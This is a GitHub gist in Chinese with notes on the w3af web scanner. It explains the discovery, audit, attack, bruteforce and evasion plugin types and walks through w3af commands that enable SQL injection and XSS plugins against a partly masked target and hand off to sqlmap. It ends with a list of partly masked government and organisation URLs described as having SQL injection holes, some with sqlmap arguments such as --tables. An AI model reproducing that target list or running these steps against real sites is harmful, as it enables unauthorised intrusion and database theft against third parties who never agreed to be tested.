Skip to content

Instantly share code, notes, and snippets.

@awuhuan
Last active January 6, 2021 07:16
Show Gist options
  • Save awuhuan/627f7c214dc1eff81cb2 to your computer and use it in GitHub Desktop.
Save awuhuan/627f7c214dc1eff81cb2 to your computer and use it in GitHub Desktop.
w3af 核心插件 discovery、audit、attack 三者。
1:discovery plugins 查找 URL、表单和网站的可注入点 injection points
2:audit plugins 针对1 找到的injection points 传入特殊的 input data 分析注入点( SQL Injection、XSS 等)
3:attack plugins 针对2 攻击了 例如 remote shell、SQL table dump、a proxy 等
除了上述三个,w3af 已有超过 130 个 plugins:
分别分为以下几大类
1: discovery:查找网页中的 injection points
2: audit:由 discovery plugins 产生的结果查找网站弱点
3: grep:搜寻网页所有内容查找其他 plugins request 的弱点
4; exploit:由 audit plugins 产生的结果传回对使用者有用的信息
5: output:根据扫描结果产生 text 或 html 的档案,可以供使用者作进一步分析
6: mangle:可利用 regular expressions 更改 requests 和 responses
7: bruteforce:做 bruteforce logins
8: evasion:可回避简单的入侵规则
------w3af 命令行使用
w3af>>> plugins //进入插件模块
w3af/plugins>>> list discovery //列出所有用于发现的插件
w3af/plugins>>> discovery findBackdoor phpinfo webSpider //启用findBackdoor phpinfo webSpider这三个插件
w3af/plugins>>> list audit //列出所有用于漏洞的插件
w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //启用blindSqli fileUpload osCommanding sqli xss这五个插件
w3af/plugins>>> back //返回主模块
w3af>>> target //进入配置目标的模块
w3af/config:target>>> set target http://www.**.cn/news.asp //把目标设置为http://www.**.cn/news.asp
w3af/config:target>>> back //返回主模块
w3af>>> exploit //进入漏洞利用模块
w3af/exploit>>> list exploit //列出所有用于漏洞利用的插件
w3af/exploit>>> exploit sqlmap //使用sqlmap进行SQL注入漏洞的测试
w3af/exploit>>> interact 0
sqlmap --wizard 自动导航
-----几个存在sql注入漏洞的站点
http://www.**.gov.cn/level2.jsp?caid=002
http://www.**.cn/news.asp?id=4715 --tables
http://www.**.gov.cn/search.htm --data title=88952634
http://www.**.org.cn/jk_ph_dj.jsp?subject_id=236
http://mob.**.cn/MenuTree.aspx?permissionid=120001
推荐社区
http://www.freebuf.com/
http://www.wooyun.org/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment